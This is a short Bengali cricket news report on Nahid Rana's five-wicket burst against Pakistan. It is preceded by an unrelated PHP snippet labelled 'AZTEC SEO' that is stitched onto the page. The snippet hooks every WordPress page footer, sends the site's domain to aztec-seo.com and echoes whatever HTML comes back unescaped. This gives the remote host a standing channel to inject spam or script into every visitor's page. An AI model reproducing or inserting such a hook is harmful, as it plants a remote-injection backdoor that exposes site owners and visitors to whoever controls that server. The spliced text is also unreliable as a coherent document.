/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
পাকিস্তানের বিপক্ষে আজ বল হাতে যেন নিজের সেরা ফর্মেই আছেন টাইগার পেসার নাহিদ রানা। সফরকারীদের প্রথম পাঁচটি উইকেট তিনি একাই শিকার করেছেন, তাও আবার প্রথম পাঁচ ওভারের মধ্যেই।
এই প্রতিবেদন লেখা পর্যন্ত পাকিস্তানের সংগ্রহ ২০ ওভার শেষে ৭১ রান, উইকেট হারিয়েছে ৬টি।
এদিন টসে জিতে শুরুতে পাকিস্তানকে ব্যাটিংয়ে পাঠিয়েছিলেন বাংলাদেশের অধিনায়ক মেহেদী হাসান মিরাজ। শুরুতে বোলিংয়ের সিদ্ধান্তটা যে সঠিক ছিল তা যেন প্রমাণ করে দেখাচ্ছেন টাইগার বোলাররা। পেসার নাহিদ রানা রীতিমত আগুন ঝরাচ্ছেন, প্রথম ছয় উইকেটের মধ্যে তিনি একাই শিকার করেছেন পাঁচ উইকেট।